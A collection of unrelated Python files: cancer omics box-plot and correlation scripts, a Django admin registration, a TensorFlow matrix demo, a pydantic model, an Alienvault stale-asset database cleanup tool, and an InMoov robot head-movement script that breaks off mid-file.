    # Star-annotated Stage I-vs-later-stage independent t-tests.
    add_stat_annotation(ax,
                        data = col_clinical_and_proteomics,
                        x = "Stage",
                        y = gene + '_transcriptomics',
                        order = order,
                        boxPairList = [("Stage I", "Stage II"),
                                       ("Stage I", "Stage III"),
                                       ("Stage I", "Stage IV")],
                        test = 't-test_ind',
                        textFormat = 'star',
                        loc = 'inside',
                        verbose = 2)
    plt.title('colon cancer')
col_tra_cli_plot(gene = "EIF4E")
#####################################################################
## Associating Clinical Variables with Proteomics in ovarian cancer##
#####################################################################
## load the dataframe for clinical results by calling the ov.get_clinical() method
ov_clinical_data = ov.get_clinical()
print(ov_clinical_data.columns)
## Choose Clinical Attribute and Merge Dataframes
ov_clinical_attribute = "Sample_Tumor_Normal"
## Merge clinical attribute with proteomics dataframe
def ov_pro_cli_plot(gene):
    """Plot *gene* proteomics, tumor vs normal, for ovarian cancer.

    Ovarian proteomics can contain duplicated '<gene>_proteomics' columns;
    duplicates are disambiguated by appending a running counter, then one
    plot is drawn per resulting column.
    """
    ov_clinical_and_proteomics = ov.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "proteomics",
        metadata_cols = "Sample_Tumor_Normal",
        omics_genes = gene)
    ov_clinical_and_proteomics.head()
    # Suffix duplicate '<gene>_proteomics' columns with 1, 2, ... so that
    # column selection below is unambiguous.
    cols = []
    count = 1
    for column in ov_clinical_and_proteomics.columns:
        if column == gene + '_proteomics':
            cols.append(gene + '_proteomics'+ str(count))
            count+=1
            continue
        cols.append(column)
    ov_clinical_and_proteomics.columns = cols
    ## Show possible variations of the tumor/normal attribute
    ov_clinical_and_proteomics["Sample_Tumor_Normal"].unique()
    Genes = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
    for i in Genes:
        print(i)
        # Re-join (and re-suffix) per column so each plot starts from the
        # full sample set before dropping NaNs for that column.
        ov_clinical_and_proteomics = ov.join_metadata_to_omics(
            metadata_df_name = "clinical",
            omics_df_name = "proteomics",
            metadata_cols = "Sample_Tumor_Normal",
            omics_genes = gene)
        cols = []
        count = 1
        for column in ov_clinical_and_proteomics.columns:
            if column == gene + '_proteomics':
                cols.append(gene + '_proteomics'+ str(count))
                count+=1
                continue
            cols.append(column)
        ov_clinical_and_proteomics.columns = cols
        ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
        plt.figure()
        sns.set(style ="white",
                font_scale = 1.5)
        order = ["Normal", "Tumor"]
        ax = sns.boxplot(x = "Sample_Tumor_Normal",
                         y = i,
                         data = ov_clinical_and_proteomics,
                         showfliers = False,
                         order = order)
        ax = sns.stripplot(x = "Sample_Tumor_Normal",
                           y = i,
                           data = ov_clinical_and_proteomics,
                           color = '.3',
                           order = order)
        # Star-annotated tumor-vs-normal independent t-test.
        add_stat_annotation(ax,
                            data = ov_clinical_and_proteomics,
                            x = "Sample_Tumor_Normal",
                            y = i,
                            order = order,
                            boxPairList = [("Normal", "Tumor")],
                            test = 't-test_ind',
                            textFormat = 'star',
                            loc = 'inside',
                            verbose = 2)
        plt.title('ovarian cancer')
ov_pro_cli_plot(gene = "EIF4E")
############################################################################
## Associating Clinical Variables with Phosphoproteomics in ovarian cancer##
############################################################################
def ov_pho_cli_plot(gene):
    """Plot each phosphosite of *gene*, tumor vs normal (ovarian cancer)."""
    ov_clinical_and_proteomics = ov.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "phosphoproteomics",
        metadata_cols = "Sample_Tumor_Normal",
        omics_genes = gene)
    ov_clinical_and_proteomics.head()
    # Drop duplicated column names, keeping the first occurrence.
    ov_clinical_and_proteomics = ov_clinical_and_proteomics.loc[:, ~ov_clinical_and_proteomics.columns.duplicated()]
    ## Show possible variations of the tumor/normal attribute
    ov_clinical_and_proteomics["Sample_Tumor_Normal"].unique()
    Genes = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
    for i in Genes:
        print(i)
        # Re-join per site so each plot starts from the full sample set.
        ov_clinical_and_proteomics = ov.join_metadata_to_omics(
            metadata_df_name = "clinical",
            omics_df_name = "phosphoproteomics",
            metadata_cols = "Sample_Tumor_Normal",
            omics_genes = gene)
        ov_clinical_and_proteomics = ov_clinical_and_proteomics.loc[:, ~ov_clinical_and_proteomics.columns.duplicated()]
        ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
        plt.figure()
        sns.set_style("white")
        order = ["Normal", "Tumor"]
        ax = sns.boxplot(x = "Sample_Tumor_Normal",
                         y = i,
                         data = ov_clinical_and_proteomics,
                         showfliers = False,
                         order = order)
        sns.stripplot(x = "Sample_Tumor_Normal",
                      y = i,
                      data = ov_clinical_and_proteomics,
                      color = '.3',
                      order = order)
        # Star-annotated tumor-vs-normal independent t-test.
        add_stat_annotation(ax,
                            data = ov_clinical_and_proteomics,
                            x = "Sample_Tumor_Normal",
                            y = i,
                            order = order,
                            boxPairList = [("Normal", "Tumor")],
                            test = 't-test_ind',
                            textFormat = 'star',
                            loc = 'inside',
                            verbose = 2)
        plt.title('ovarian cancer')
ov_pho_cli_plot(gene = "EIF4EBP1")
def ovcliplot(gene):
    """Plot each phosphosite of *gene* across ovarian FIGO tumor stages.

    NOTE(review): metadata_cols is commented out, so the join pulls in all
    clinical columns; the per-site dropna is also commented out, so NaN
    measurements flow into the plots -- confirm both are intentional.
    """
    ov_clinical_and_proteomics = ov.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "phosphoproteomics",
        # metadata_cols = "Tumor_Stage_Ovary_FIGO",
        omics_genes = gene)
    # Samples without a FIGO stage are treated as normal tissue.
    ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"] = ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"].fillna("Normal")
    ov_clinical_and_proteomics.head()
    ## Show possible variations of the FIGO stage attribute
    ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"].unique()
    PhosphoSite = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
    for i in PhosphoSite:
        print(i)
        # Re-join per site so each plot starts from the full sample set.
        ov_clinical_and_proteomics = ov.join_metadata_to_omics(
            metadata_df_name = "clinical",
            omics_df_name = "phosphoproteomics",
            # metadata_cols = "Tumor_Stage_Ovary_FIGO",
            omics_genes = gene)
        ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"] = ov_clinical_and_proteomics["Tumor_Stage_Ovary_FIGO"].fillna("Normal")
        # ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
        plt.figure()
        sns.set_style("white")
        order = ["Normal",
                 "IIIA",
                 "IIIB",
                 "IIIC",
                 "IV"]
        ax = sns.boxplot(x = "Tumor_Stage_Ovary_FIGO",
                         y = i,
                         data = ov_clinical_and_proteomics,
                         showfliers = False,
                         order = order)
        sns.stripplot(x = "Tumor_Stage_Ovary_FIGO",
                      y = i,
                      data = ov_clinical_and_proteomics,
                      color = '.3',
                      order = order)
        # Star-annotated Normal-vs-each-FIGO-stage independent t-tests.
        add_stat_annotation(ax,
                            data = ov_clinical_and_proteomics,
                            x = "Tumor_Stage_Ovary_FIGO",
                            y = i,
                            order = order,
                            boxPairList = [("Normal", "IIIA"),
                                           ("Normal", "IIIB"),
                                           ("Normal", "IIIC"),
                                           ("Normal", "IV")],
                            test = 't-test_ind',
                            textFormat = 'star',
                            loc = 'inside',
                            verbose = 2)
        plt.title('ovarian cancer')
ovcliplot(gene = "EIF4E")
###########################################################################
## Associating Clinical Variables with Transcriptomics in ovarian cancer ##
###########################################################################
## Merge clinical attribute with transcriptomics dataframe
def ov_tra_cli_plot(gene):
    """Plot *gene* transcriptomics, tumor vs normal, for ovarian cancer.

    Duplicated '<gene>_transcriptomics' columns are disambiguated with a
    running counter; one plot is drawn per resulting column.
    """
    ov_clinical_and_proteomics = ov.join_metadata_to_omics(
        metadata_df_name = "clinical",
        omics_df_name = "transcriptomics",
        metadata_cols = "Sample_Tumor_Normal",
        omics_genes = gene)
    ov_clinical_and_proteomics.head()
    # Suffix duplicate columns with 1, 2, ... so selection is unambiguous.
    cols = []
    count = 1
    for column in ov_clinical_and_proteomics.columns:
        if column == gene + '_transcriptomics':
            cols.append(gene + '_transcriptomics'+ str(count))
            count+=1
            continue
        cols.append(column)
    ov_clinical_and_proteomics.columns = cols
    ## Show possible variations of the tumor/normal attribute
    ov_clinical_and_proteomics["Sample_Tumor_Normal"].unique()
    Genes = list(ov_clinical_and_proteomics.filter(like = gene).columns.values.tolist())
    for i in Genes:
        print(i)
        # Re-join (and re-suffix) per column so each plot starts from the
        # full sample set before dropping NaNs for that column.
        ov_clinical_and_proteomics = ov.join_metadata_to_omics(
            metadata_df_name = "clinical",
            omics_df_name = "transcriptomics",
            metadata_cols = "Sample_Tumor_Normal",
            omics_genes = gene)
        cols = []
        count = 1
        for column in ov_clinical_and_proteomics.columns:
            if column == gene + '_transcriptomics':
                cols.append(gene + '_transcriptomics'+ str(count))
                count+=1
                continue
            cols.append(column)
        ov_clinical_and_proteomics.columns = cols
        ov_clinical_and_proteomics = ov_clinical_and_proteomics.dropna(subset = [i])
        plt.figure()
        sns.set(style ="white",
                font_scale = 1.5)
        order = ["Normal", "Tumor"]
        ax = sns.boxplot(x = "Sample_Tumor_Normal",
                         y = i,
                         data = ov_clinical_and_proteomics,
                         showfliers = False,
                         order = order)
        ax = sns.stripplot(x = "Sample_Tumor_Normal",
                           y = i,
                           data = ov_clinical_and_proteomics,
                           color = '.3',
                           order = order)
        # Star-annotated tumor-vs-normal independent t-test.
        add_stat_annotation(ax,
                            data = ov_clinical_and_proteomics,
                            x = "Sample_Tumor_Normal",
                            y = i,
                            order = order,
                            boxPairList = [("Normal", "Tumor")],
                            test = 't-test_ind',
                            textFormat = 'star',
                            loc = 'inside',
                            verbose = 2)
        plt.title('ovarian cancer')
ov_tra_cli_plot(gene = "EIF4E")
### Extra controls
## correlation between a gene1 phosphosite and gene2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2, site = "S243"):
    """Scatter+regression of a *gene1* phosphosite vs *gene2* mRNA (endometrial).

    Generalized: the phosphosite is now a parameter (default "S243", the value
    previously hard-coded) and the transcriptomics column is derived from
    *gene2* instead of being hard-coded to SOX2.  With the defaults and the
    original call (gene1="JUN", gene2="SOX2") the output is unchanged.
    """
    phos_col = gene1 + '-' + site + '_phosphoproteomics'
    trans_col = gene2 + '_transcriptomics'
    gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
                                           df2_name = "transcriptomics",
                                           genes1 = gene1,
                                           genes2 = gene2)
    print(gene_cross_en.head())
    # Pearson's r is undefined with NaNs; keep only samples with the site measured.
    gene_cross_en = gene_cross_en.dropna(subset = [phos_col])
    print(gene_cross_en.head())
    corr = pearsonr(gene_cross_en[phos_col],
                    gene_cross_en[trans_col])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style ="white",
            font_scale = 1.5)
    plot = sns.regplot(x = gene_cross_en[phos_col],
                       y = gene_cross_en[trans_col],
                       data = gene_cross_en)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Anchor the r/p annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    plot.set(xlabel = gene1 + '-' + site + ' phosphoproteomics',
             ylabel = gene2 + ' transcriptomics',
             title = 'Proteomics vs Transcriptomics (Endometrial Cancer)')
    plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-T239 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
    """Regression of JUN-T239 phosphorylation vs SOX2 mRNA (endometrial).

    NOTE(review): redefines encorrelationplot; only the hard-coded phosphosite
    differs from the previous definition.  gene1/gene2 feed the join, but the
    plotted columns are hard-coded.
    """
    gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
                                           df2_name = "transcriptomics",
                                           genes1 = gene1,
                                           genes2 = gene2)
    print(gene_cross_en.head())
    # Pearson's r is undefined with NaNs; drop unmeasured samples.
    gene_cross_en = gene_cross_en.dropna(subset = ['JUN-T239_phosphoproteomics'])
    print(gene_cross_en.head())
    corr = pearsonr(gene_cross_en['JUN-T239_phosphoproteomics'],
                    gene_cross_en['SOX2_transcriptomics'])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style ="white",
            font_scale = 1.5)
    plot = sns.regplot(x = gene_cross_en['JUN-T239_phosphoproteomics'],
                       y = gene_cross_en['SOX2_transcriptomics'],
                       data = gene_cross_en)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Anchor the r/p annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    plot.set(xlabel = 'JUN-T239 phosphoproteomics',
             ylabel = 'SOX2 transcriptomics',
             title = 'Proteomics vs Transcriptomics (Endometrial Cancer)')
    plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S58 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
    """Regression of JUN-S58 phosphorylation vs SOX2 mRNA (endometrial).

    NOTE(review): redefines encorrelationplot again; only the hard-coded
    phosphosite differs.
    """
    gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
                                           df2_name = "transcriptomics",
                                           genes1 = gene1,
                                           genes2 = gene2)
    print(gene_cross_en.head())
    # Pearson's r is undefined with NaNs; drop unmeasured samples.
    gene_cross_en = gene_cross_en.dropna(subset = ['JUN-S58_phosphoproteomics'])
    print(gene_cross_en.head())
    corr = pearsonr(gene_cross_en['JUN-S58_phosphoproteomics'],
                    gene_cross_en['SOX2_transcriptomics'])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style = "white")
    plot = sns.regplot(x = gene_cross_en['JUN-S58_phosphoproteomics'],
                       y = gene_cross_en['SOX2_transcriptomics'],
                       data = gene_cross_en)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Anchor the r/p annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    plot.set(xlabel = 'JUN-S58 phosphoproteomics',
             ylabel = gene2 + ' transcriptomics',
             title = 'Proteomics vs Transcriptomics (Endometrial Cancer)')
    plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S63 and SOX2 mRNA in endometrial cancer
def encorrelationplot(gene1, gene2):
    """Regression of JUN-S63 phosphorylation vs SOX2 mRNA (endometrial).

    NOTE(review): final redefinition of encorrelationplot; only the
    hard-coded phosphosite differs.
    """
    gene_cross_en = en.join_omics_to_omics(df1_name = "phosphoproteomics",
                                           df2_name = "transcriptomics",
                                           genes1 = gene1,
                                           genes2 = gene2)
    print(gene_cross_en.head())
    # Pearson's r is undefined with NaNs; drop unmeasured samples.
    gene_cross_en = gene_cross_en.dropna(subset = ['JUN-S63_phosphoproteomics'])
    print(gene_cross_en.head())
    corr = pearsonr(gene_cross_en['JUN-S63_phosphoproteomics'],
                    gene_cross_en['SOX2_transcriptomics'])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style = "white")
    plot = sns.regplot(x = gene_cross_en['JUN-S63_phosphoproteomics'],
                       y = gene_cross_en['SOX2_transcriptomics'],
                       data = gene_cross_en)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Anchor the r/p annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    plot.set(xlabel = 'JUN-S63 phosphoproteomics',
             ylabel = gene2 + ' transcriptomics',
             title = 'Proteomics vs Transcriptomics for ' + gene1 + ' (Endometrial Cancer)')
    plt.show()
encorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S63 and SOX2 mRNA in ovarian cancer
def ovcorrelationplot(gene1, gene2):
    """Regression of JUN-S63s phosphorylation vs SOX2 mRNA (ovarian).

    NOTE(review): the ovarian column name carries a trailing 's'
    ('JUN-S63s_...') while the axis label omits it -- presumably the ovarian
    dataset's site-naming convention; confirm.  Plotted columns are
    hard-coded; gene1/gene2 feed the join and labels.
    """
    gene_cross_ov = ov.join_omics_to_omics(df1_name = "phosphoproteomics",
                                           df2_name = "transcriptomics",
                                           genes1 = gene1,
                                           genes2 = gene2)
    print(gene_cross_ov.head())
    # Pearson's r is undefined with NaNs; drop unmeasured samples.
    gene_cross_ov = gene_cross_ov.dropna(subset = ['JUN-S63s_phosphoproteomics'])
    print(gene_cross_ov.head())
    corr = pearsonr(gene_cross_ov['JUN-S63s_phosphoproteomics'],
                    gene_cross_ov['SOX2_transcriptomics'])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style = "white")
    plot = sns.regplot(x = gene_cross_ov['JUN-S63s_phosphoproteomics'],
                       y = gene_cross_ov['SOX2_transcriptomics'],
                       data = gene_cross_ov)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Anchor the r/p annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    plot.set(xlabel = 'JUN-S63 phosphoproteomics',
             ylabel = gene2 + ' transcriptomics',
             title = 'Proteomics vs Transcriptomics for ' + gene1 + ' (Ovarian Cancer)')
    plt.show()
ovcorrelationplot(gene1 = "JUN", gene2 = "SOX2")
## correlation between JUN-S73 and SOX2 mRNA in ovarian cancer
def ovcorrelationplot(gene1, gene2):
    """Regression of JUN-S73s phosphorylation vs SOX2 mRNA (ovarian).

    NOTE(review): redefines ovcorrelationplot; only the hard-coded
    phosphosite differs from the previous definition.
    """
    gene_cross_ov = ov.join_omics_to_omics(df1_name = "phosphoproteomics",
                                           df2_name = "transcriptomics",
                                           genes1 = gene1,
                                           genes2 = gene2)
    print(gene_cross_ov.head())
    # Pearson's r is undefined with NaNs; drop unmeasured samples.
    gene_cross_ov = gene_cross_ov.dropna(subset = ['JUN-S73s_phosphoproteomics'])
    #gene_cross_ov = np.log2(gene_cross_ov)
    print(gene_cross_ov.head())
    corr = pearsonr(gene_cross_ov['JUN-S73s_phosphoproteomics'],
                    gene_cross_ov['SOX2_transcriptomics'])
    corr = [np.round(c, 2) for c in corr]
    print(corr)
    sns.set(style = "white")
    plot = sns.regplot(x = gene_cross_ov['JUN-S73s_phosphoproteomics'],
                       y = gene_cross_ov['SOX2_transcriptomics'],
                       data = gene_cross_ov)
    text = 'r=%s, p=%s' % (corr[0], corr[1])
    # Anchor the r/p annotation near the top-left corner of the axes.
    tl = ((plot.get_xlim()[1] - plot.get_xlim()[0])*0.010 + plot.get_xlim()[0],
          (plot.get_ylim()[1] - plot.get_ylim()[0])*0.95 + plot.get_ylim()[0])
    plot.text(tl[0], tl[1], text, fontsize=12)
    plot.set(xlabel = 'JUN-S73 phosphoproteomics',
             ylabel = gene2 + ' transcriptomics',
             title = 'Proteomics vs Transcriptomics for ' + gene1 + ' (Ovarian Cancer)')
    plt.show()
ovcorrelationplot(gene1 = "JUN", gene2 = "SOX2")
|
from django.contrib import admin
from shrapnel.polls.models import Poll, PollAnswer, PollOption

# Expose the poll models in the Django admin with the default ModelAdmin.
admin.site.register(Poll)
admin.site.register(PollAnswer)
admin.site.register(PollOption)
|
import tensorflow as tf
import numpy as np
# Two 3x3 integer operand matrices built with numpy.
matrix1 = np.array([(2,2,2),(2,2,2),(2,2,2)],dtype = 'int32')
matrix2 = np.array([(1,1,1),(1,1,1),(1,1,1)],dtype = 'int32')
print (matrix1)
print (matrix2)
# Wrap the numpy arrays as constant tensors in the default graph.
matrix1 = tf.constant(matrix1)
matrix2 = tf.constant(matrix2)
matrix_product = tf.matmul(matrix1, matrix2)
matrix_sum = tf.add(matrix1,matrix2)
# The determinant op requires a floating-point matrix.
matrix_3 = np.array([(2,7,2),(1,4,2),(9,0,2)],dtype = 'float32')
print (matrix_3)
# NOTE(review): tf.matrix_determinant and tf.Session are TensorFlow 1.x
# APIs (tf.linalg.det + eager execution in 2.x) -- this script needs TF1.
matrix_det = tf.matrix_determinant(matrix_3)
# Evaluate all three ops inside one session.
with tf.Session() as sess:
    result1 = sess.run(matrix_product)
    result2 = sess.run(matrix_sum)
    result3 = sess.run(matrix_det)
print (result1)
print (result2)
print (result3)
# # The pdia Library: Process Data in Assessment
#
# ```
# Gary Feng & Fred Yan
# 2016, 2017
# Princeton, NJ
# ```
#
# This is a collection of functions written for processing the NAEP process data.
from pdia.dataImport.sql2csv import *
from pdia.dataImport.parsePearsonObservableXML import *
from pdia.utils.durSinceBlockStart import *
from pdia.extendedInfoParser.parseExtendedInfo import *
from pdia.utils.logger import *
from pdia.qc.dropBlocksMatching import *
from pdia.qc.dropDuplicatedEvents import *
from pdia.qc.dropStudents import *
from pdia.utils import *
errorCode = "ParsingError"
|
from __future__ import annotations
from pydantic import BaseModel, Field, validator
from typing import List, Optional
class MorphActionModel(BaseModel):
    """Morph Model - generated from the Morph module. A type of SchemaActionModel."""

    name: str = Field(..., description="Name of the Action. Uppercase.")
    title: str = Field(..., description="Title of the Action. Regular case.")
    description: str = Field(..., description="Description of the purpose for performing this action.")
    structure: Optional[List[str]] = Field(
        default=[],
        description="The structure of an action depends on source column fields, and integer row indices.",
    )

    class Config:
        # Serialise enums by value, trim whitespace, and re-validate on assignment.
        use_enum_values = True
        anystr_strip_whitespace = True
        validate_assignment = True

    @validator("structure")
    def check_valid_models(cls, v):
        # Every entry must name one of the three recognised structure parts.
        allowed = ("columns", "rows", "source")
        for entry in v:
            if entry not in allowed:
                raise ValueError(f"Structure ({entry}) must be of either `source`, `columns`, or `rows`.")
        return v
|
#!/usr/bin/python
"""Alienvault Asset Removal Tool - For hosts that haven't been spotted in awhile.
Nicholas Albright
Copyright, 2017.
"""
import sys
import socket
import struct
import MySQLdb, MySQLdb.cursors
# Alienvault setup file that holds the DB credentials parsed by config_parse().
CONFIG_FILE = '/etc/ossim/ossim_setup.conf'
MYHOSTNAME = socket.gethostname()
REMOVE_OLDER_THAN = 30  # Remove assets older than XX days.
# Module-level DB cursor; assigned in the __main__ block after connecting.
CURSOR = None
def clean_plugins(ipaddr, plugin_file='/etc/ossim/agent/config.yml'):
    """Remove every plugin entry mentioning *ipaddr* from the agent config.

    The config lists plugin log paths as ``- /...`` entries; the file text is
    split on that marker, entry chunks containing the address are dropped, and
    the file is rewritten.  Returns True when at least one entry was removed,
    False otherwise (the file is then left untouched).

    Fixes vs the original: the read handle is closed (it was leaked); the
    header chunk (before the first entry) is never dropped; the ``- /`` marker
    is re-attached by position rather than by the accumulator being non-empty,
    which glued the entry after a removed first entry onto the header without
    its marker; the file is only rewritten -- and True only returned -- when
    something actually matched.
    """
    with open(plugin_file, 'r') as config_fh:
        config_in = config_fh.read()
    kept = []
    removed = False
    for idx, content in enumerate(config_in.split('- /')):
        # idx 0 is the text before the first entry marker; keep it always.
        if idx and ipaddr in content:
            removed = True
            continue
        # Re-attach the '- /' marker consumed by split() for real entries.
        kept.append(content if idx == 0 else '- /' + content)
    if removed:
        with open(plugin_file, 'w') as config_out:
            config_out.write(''.join(kept))
        return True
    return False
def config_parse(conffile):
    """Parse the Alienvault setup file and return the DB credential settings.

    Only the ``user=``, ``pass=`` and ``db_ip=`` lines are kept; values may
    themselves contain '=' (split on the first one only).  Exits the process
    with a message on any read/parse failure, matching the original
    behaviour of this CLI tool.

    Fixes vs the original: the file handle is closed via a context manager
    (it was leaked), and the three prefixes are tested with one
    startswith(tuple) call.
    """
    parsed_config = {}
    try:
        with open(conffile) as config_fh:
            for line in config_fh.read().splitlines():
                if line.startswith(('user=', 'db_ip=', 'pass=')):
                    k, v = line.split('=', 1)
                    parsed_config[k] = v
    except Exception as err:
        sys.exit('Config Parser error: %s' % err)
    return parsed_config
def db_connect(username, password):
    """Open a MySQLdb connection to the local 'alienvault' database.

    Credentials come from config_parse(); the caller owns the connection
    (commits and closes it).
    """
    conn = MySQLdb.connect(host='127.0.0.1', user=username, passwd=password, db='alienvault')
    return conn
def get_assets(remove_days=30):
    """Return (host_id_hex, ctx_hex) tuples for stale internal assets.

    Selects hosts with external_host = 0 whose `updated` timestamp is older
    than NOW() minus *remove_days* days.

    Fixes vs the original: isinstance() replaces the `type(x) != int`
    comparison, and the interval is passed as a bound query parameter instead
    of being %-interpolated into the SQL text (the type check remains as a
    second guard).
    """
    if not isinstance(remove_days, int):
        raise Exception('Error - Get_assets requires an integer.')
    find_asset_sql = ('select hex(id),hex(ctx) from host '
                      'where external_host = 0 and updated < DATE_SUB(NOW(), INTERVAL %s DAY);')
    CURSOR.execute(find_asset_sql, (remove_days,))
    # Each fetched row is (id_hex, ctx_hex).
    return [(x[0], x[1]) for x in CURSOR.fetchall()]
def get_asset_ip(asset_hex_id):
    """Return the asset's IP as a hex string from host_ip, or False if absent.

    NOTE(review): the id is %-interpolated into the SQL; it originates from
    the host table so it should be hex-only, but a parameterised query would
    be safer.
    """
    get_ip = 'SELECT hex(ip) from host_ip where host_id = unhex("%s")' % asset_hex_id
    CURSOR.execute(get_ip)
    x = CURSOR.fetchone()
    if not x:
        # No host_ip row linked to this host id.
        return False
    return x[0]
def remove_from_ossim_db(host_id, host_ip, ctx_id, human_ip):
    """Delete all OSSIM-DB rows referencing an asset.

    Reference/child tables are cleared first; the `host` row itself is
    deleted near the end, followed by the Nessus report tables keyed on the
    dotted-quad IP.  NOTE(review): values are str.format-ed into the SQL;
    they come from the DB itself (hex ids / a computed IP), but
    parameterised queries would be safer.
    """
    remove_sql = [
        'UPDATE hids_agents SET host_id = NULL WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_scan WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_software WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_services WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_properties WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_types WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_sensor_reference WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_ip WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_plugin_sid WHERE host_ip IN (UNHEX("{host_ip}")) AND ctx = UNHEX("{ctx}");',
        'DELETE FROM bp_member_status WHERE member_id = UNHEX("{host_id}");',
        'DELETE FROM bp_asset_member WHERE member = UNHEX("{host_id}") AND type = "host";',
        'DELETE FROM host_vulnerability WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_qualification WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host_group_reference WHERE host_id = UNHEX("{host_id}");',
        'DELETE FROM host WHERE id = UNHEX("{host_id}");',
        'DELETE FROM vuln_nessus_latest_reports WHERE hostIP IN ("{human_ip}");',
        'DELETE FROM vuln_nessus_latest_results WHERE hostIP IN ("{human_ip}");'
    ]
    # Caller commits; each statement runs on the shared module cursor.
    for row in remove_sql:
        CURSOR.execute(row.format(host_id=host_id, ctx=ctx_id, host_ip=host_ip, human_ip=human_ip))
if __name__ == '__main__':
    # Optional CLI argument: age threshold in days.
    if len(sys.argv) == 2:
        REMOVE_OLDER_THAN = int(sys.argv[1])
    pc = config_parse(CONFIG_FILE)
    mysql_conn = db_connect(pc['user'], pc['pass'])
    CURSOR = mysql_conn.cursor()
    asset_hexids = get_assets(REMOVE_OLDER_THAN)
    print('%s assets identified.' % len(asset_hexids))  # fixed typo "identifed"
    # raw_input('Press any key to continue...')
    for row in asset_hexids:
        asset_id, ctx = row
        print('Removing: %s...' % asset_id)
        hexip = get_asset_ip(asset_id)
        if not hexip:
            # Host row with no host_ip link; placeholder IP so the
            # vuln_nessus deletes match nothing real.
            human_ip = 'BROKEN_LINK_BAD_DB_ENTRY'
            hexip = '00'
        else:
            # host_ip.ip is stored as hex; convert to dotted-quad for the
            # Nessus report tables.
            human_ip = socket.inet_ntoa(struct.pack('!L', int(hexip, 16)))
        remove_from_ossim_db(asset_id, hexip, ctx, human_ip)
    # Single commit after all assets are processed.
    mysql_conn.commit()
|
import random
from time import sleep

# Start the InMoov service and attach the head servos on COM3.
i01 = Runtime.createAndStart("i01", "InMoov")
i01.startHead("COM3")
sleep(1)
# Gate flag: 1 = random head movement enabled, 0 = hold position.
# Fixed: initialised *before* the clock starts -- the original script only
# assigned it after startClock(), so an early pulse/clockStarted callback
# read an undefined name (NameError race).
IcanMoveHeadRandom = 0
# Worker called from the timer callbacks.
def MoveHeadRandomize():
    """Move the head to a random neck/rothead position when enabled."""
    if IcanMoveHeadRandom==1:
        i01.moveHead(random.randint(50,130),random.randint(50,130))
# Create the timer (Clock) service.
MoveHeadTimer = Runtime.start("MoveHeadTimer","Clock")
MoveHeadTimer.setInterval(1001)
# Main timer callback, invoked on every clock pulse.
def MoveHead(timedata):
    """Move randomly, then randomise the interval before the next pulse."""
    MoveHeadRandomize()
    MoveHeadTimer.setInterval(random.randint(600,1200))
# Invoked when MoveHeadTimer.stopClock() fires.
